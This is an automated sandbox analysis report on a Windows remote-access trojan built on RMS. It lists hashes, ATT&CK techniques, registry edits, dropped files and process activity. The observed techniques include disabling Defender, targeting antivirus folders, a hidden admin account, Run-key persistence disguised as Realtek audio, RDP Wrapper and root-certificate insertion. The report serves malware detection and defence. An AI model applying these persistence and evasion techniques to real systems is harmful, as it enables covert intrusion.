rms | 22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f

Analysis

max time kernel
150s
max time network
158s
platform
windows7_x64
resource
win7-20220414-en
submitted
24-05-2022 02:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
Size

10.6MB
MD5

f91f26d0d89bfacb228fcc9d1ca546dc
SHA1

19e61923b8fac8149b9109ac6633dba760608218
SHA256

22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f
SHA512

bf4fff966e3fa0f2bed6442ca80a336d607885aa255357e522bc02753d1a4b7e5b25edf0065f8ad1c90491b8c72b0c1ee9b2e097f535e85ad056c80c4e653d1f

Score

10^/10

rms aspackv2 discovery evasion persistence rat trojan upx

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
Modifies visiblity of hidden/system files in Explorer 2 TTPs
evasion

Hidden Files and Directories
T1158

Modify Registry
T1112

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1112	1208	icacls.exe	130

RMS
Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.
trojan rat rms
UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Windows security bypass 2 TTPs
evasion trojan

Disabling Security Tools
T1089

Modify Registry
T1112

ACProtect 1.3x - 1.4x DLL software 2 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/files/0x00060000000142c1-171.dat	acprotect
behavioral1/files/0x0006000000014239-170.dat	acprotect

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

ASPack v2.12-2.42 11 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral1/files/0x0006000000014202-81.dat	aspack_v212_v242
behavioral1/files/0x0006000000014202-82.dat	aspack_v212_v242
behavioral1/files/0x0006000000014202-84.dat	aspack_v212_v242
behavioral1/files/0x0006000000014202-117.dat	aspack_v212_v242
behavioral1/files/0x0006000000014202-133.dat	aspack_v212_v242
behavioral1/files/0x0006000000014202-148.dat	aspack_v212_v242
behavioral1/files/0x000600000001414f-172.dat	aspack_v212_v242
behavioral1/files/0x000600000001414f-179.dat	aspack_v212_v242
behavioral1/files/0x000600000001414f-182.dat	aspack_v212_v242
behavioral1/files/0x000600000001414f-186.dat	aspack_v212_v242
behavioral1/files/0x000600000001414f-214.dat	aspack_v212_v242

Blocks application from running via registry modification
Adds application to list of disallowed applications.
evasion

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe

Executes dropped EXE 17 IoCs

pid	Process
1764	wini.exe
904	winit.exe
1192	rutserv.exe
1760	cheat.exe
1712	taskhost.exe
2020	rutserv.exe
316	rutserv.exe
1632	rutserv.exe
1320	rfusclient.exe
1988	rfusclient.exe
1600	R8.exe
2636	rfusclient.exe
2660	Rar.exe
2116	RDPWInst.exe
2636	RDPWInst.exe
2840	taskhostw.exe
2696	winlogon.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Sets file to hidden 1 TTPs
Modifies file attributes to stop it showing in Explorer etc.
evasion

Hidden Files and Directories
T1158
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00060000000142c1-171.dat	upx
behavioral1/files/0x0006000000014239-170.dat	upx

Loads dropped DLL 18 IoCs

pid	Process
1992	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
1764	wini.exe
1764	wini.exe
1764	wini.exe
1764	wini.exe
1088	cmd.exe
1992	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
1760	cheat.exe
1760	cheat.exe
1760	cheat.exe
1760	cheat.exe
1632	rutserv.exe
1712	taskhost.exe
300	cmd.exe
2960	cmd.exe
2284	Process not Found
2960	cmd.exe
1992	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe

Modifies file permissions 1 TTPs 56 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
580	icacls.exe
1004	icacls.exe
2772	icacls.exe
2384	icacls.exe
1192	icacls.exe
2140	icacls.exe
2308	icacls.exe
2324	icacls.exe
2896	icacls.exe
1696	icacls.exe
1120	icacls.exe
1628	icacls.exe
2440	icacls.exe
956	icacls.exe
1840	icacls.exe
544	icacls.exe
1616	icacls.exe
2584	icacls.exe
2820	icacls.exe
2168	icacls.exe
1676	icacls.exe
1216	icacls.exe
584	icacls.exe
3008	icacls.exe
1180	icacls.exe
308	icacls.exe
1112	icacls.exe
812	icacls.exe
2380	icacls.exe
2684	icacls.exe
2276	icacls.exe
2748	icacls.exe
3036	icacls.exe
1224	icacls.exe
2888	icacls.exe
2576	icacls.exe
3016	icacls.exe
1088	icacls.exe
844	icacls.exe
1216	icacls.exe
2316	icacls.exe
564	icacls.exe
2288	icacls.exe
1704	icacls.exe
1716	icacls.exe
1584	icacls.exe
1140	icacls.exe
2384	icacls.exe
984	icacls.exe
1808	icacls.exe
1904	icacls.exe
2868	icacls.exe
2628	icacls.exe
2708	icacls.exe
2996	icacls.exe
324	icacls.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	taskhostw.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio = "C:\\ProgramData\\RealtekHD\\taskhostw.exe"	taskhostw.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
6	ip-api.com

Modifies WinLogon 2 TTPs 7 IoCs

persistence

Winlogon Helper DLL

T1004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\John = "0"	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe

AutoIT Executable 12 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000600000001422c-62.dat	autoit_exe
behavioral1/files/0x000600000001422c-64.dat	autoit_exe
behavioral1/files/0x000600000001422c-66.dat	autoit_exe
behavioral1/files/0x000600000001422c-65.dat	autoit_exe
behavioral1/files/0x000600000001422c-68.dat	autoit_exe
behavioral1/files/0x000600000001422c-71.dat	autoit_exe
behavioral1/files/0x0006000000014491-100.dat	autoit_exe
behavioral1/files/0x0006000000014491-106.dat	autoit_exe
behavioral1/files/0x0006000000014491-103.dat	autoit_exe
behavioral1/files/0x0006000000014491-102.dat	autoit_exe
behavioral1/files/0x0006000000014491-101.dat	autoit_exe
behavioral1/files/0x0006000000014491-110.dat	autoit_exe

Drops file in Program Files directory 26 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.dll	attrib.exe
File opened for modification	C:\Program Files (x86)\Cezurity	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
File opened for modification	C:\Program Files\Common Files\McAfee	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
File created	C:\Program Files\Common Files\System\iediagcmd.exe	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
File opened for modification	C:\Program Files\COMODO	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File opened for modification	C:\Program Files\RDP Wrapper	attrib.exe
File opened for modification	C:\Program Files (x86)\AVAST Software	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
File opened for modification	C:\Program Files\AVG	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
File opened for modification	C:\Program Files\Kaspersky Lab	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
File opened for modification	C:\Program Files\ByteFence	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
File opened for modification	C:\Program Files (x86)\360	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
File opened for modification	C:\Program Files\Malwarebytes	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
File opened for modification	C:\Program Files\Enigma Software Group	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	attrib.exe
File opened for modification	C:\Program Files (x86)\AVG	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
File opened for modification	C:\Program Files (x86)\Panda Security	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
File opened for modification	C:\Program Files (x86)\SpyHunter	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe
File opened for modification	C:\Program Files\AVAST Software	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
File opened for modification	C:\Program Files (x86)\Kaspersky Lab	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
File opened for modification	C:\Program Files\Cezurity	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
File opened for modification	C:\Program Files (x86)\GRIZZLY Antivirus	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
File opened for modification	C:\Program Files\ESET	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
File opened for modification	C:\Program Files (x86)\Microsoft JDX	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
File opened for modification	C:\Program Files\SpyHunter	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1772	schtasks.exe
2520	schtasks.exe

Delays execution with timeout.exe 5 IoCs

evasion

pid	Process
2908	timeout.exe
812	timeout.exe
2384	timeout.exe
2484	timeout.exe
2836	timeout.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
2984	ipconfig.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
852	taskkill.exe
2332	taskkill.exe
2704	taskkill.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database	winit.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	RDPWInst.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	RDPWInst.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	RDPWInst.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	RDPWInst.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	RDPWInst.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\WinMgmts:\	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\winmgmts:\localhost\root\CIMV2	taskhostw.exe

Runs .reg file with regedit 2 IoCs

pid	Process
1716	regedit.exe
432	regedit.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 54 IoCs

pid	Process
1992	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
1992	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
1992	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
1992	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
1992	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe
1192	rutserv.exe
1192	rutserv.exe
1192	rutserv.exe
1192	rutserv.exe
2020	rutserv.exe
2020	rutserv.exe
316	rutserv.exe
316	rutserv.exe
1632	rutserv.exe
1632	rutserv.exe
1632	rutserv.exe
1632	rutserv.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
904	winit.exe
1320	rfusclient.exe
2840	taskhostw.exe

Suspicious behavior: LoadsDriver 4 IoCs

pid	Process
460	Process not Found
2284	Process not Found
2284	Process not Found
2284	Process not Found

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
2636	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	1192	rutserv.exe
Token: SeDebugPrivilege	316	rutserv.exe
Token: SeTakeOwnershipPrivilege	1632	rutserv.exe
Token: SeTcbPrivilege	1632	rutserv.exe
Token: SeTcbPrivilege	1632	rutserv.exe
Token: SeDebugPrivilege	852	taskkill.exe
Token: SeDebugPrivilege	2332	taskkill.exe
Token: SeDebugPrivilege	2704	taskkill.exe
Token: SeDebugPrivilege	2116	RDPWInst.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
1192	rutserv.exe
2020	rutserv.exe
316	rutserv.exe
1632	rutserv.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1992 wrote to memory of 1772	1992	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe	27
PID 1992 wrote to memory of 1772	1992	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe	27
PID 1992 wrote to memory of 1772	1992	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe	27
PID 1992 wrote to memory of 1772	1992	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe	27
PID 1992 wrote to memory of 1764	1992	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe	28
PID 1992 wrote to memory of 1764	1992	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe	28
PID 1992 wrote to memory of 1764	1992	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe	28
PID 1992 wrote to memory of 1764	1992	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe	28
PID 1764 wrote to memory of 956	1764	wini.exe	30
PID 1764 wrote to memory of 956	1764	wini.exe	30
PID 1764 wrote to memory of 956	1764	wini.exe	30
PID 1764 wrote to memory of 956	1764	wini.exe	30
PID 1764 wrote to memory of 904	1764	wini.exe	31
PID 1764 wrote to memory of 904	1764	wini.exe	31
PID 1764 wrote to memory of 904	1764	wini.exe	31
PID 1764 wrote to memory of 904	1764	wini.exe	31
PID 956 wrote to memory of 1088	956	WScript.exe	32
PID 956 wrote to memory of 1088	956	WScript.exe	32
PID 956 wrote to memory of 1088	956	WScript.exe	32
PID 956 wrote to memory of 1088	956	WScript.exe	32
PID 956 wrote to memory of 1088	956	WScript.exe	32
PID 956 wrote to memory of 1088	956	WScript.exe	32
PID 956 wrote to memory of 1088	956	WScript.exe	32
PID 1088 wrote to memory of 432	1088	cmd.exe	34
PID 1088 wrote to memory of 432	1088	cmd.exe	34
PID 1088 wrote to memory of 432	1088	cmd.exe	34
PID 1088 wrote to memory of 432	1088	cmd.exe	34
PID 1088 wrote to memory of 1716	1088	cmd.exe	35
PID 1088 wrote to memory of 1716	1088	cmd.exe	35
PID 1088 wrote to memory of 1716	1088	cmd.exe	35
PID 1088 wrote to memory of 1716	1088	cmd.exe	35
PID 1088 wrote to memory of 812	1088	cmd.exe	36
PID 1088 wrote to memory of 812	1088	cmd.exe	36
PID 1088 wrote to memory of 812	1088	cmd.exe	36
PID 1088 wrote to memory of 812	1088	cmd.exe	36
PID 1088 wrote to memory of 1192	1088	cmd.exe	37
PID 1088 wrote to memory of 1192	1088	cmd.exe	37
PID 1088 wrote to memory of 1192	1088	cmd.exe	37
PID 1088 wrote to memory of 1192	1088	cmd.exe	37
PID 1992 wrote to memory of 1760	1992	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe	39
PID 1992 wrote to memory of 1760	1992	22a2fc907d960e67fe9def8946907fd324f77afce3f2792750f1ddb1de76fc9f.exe	39
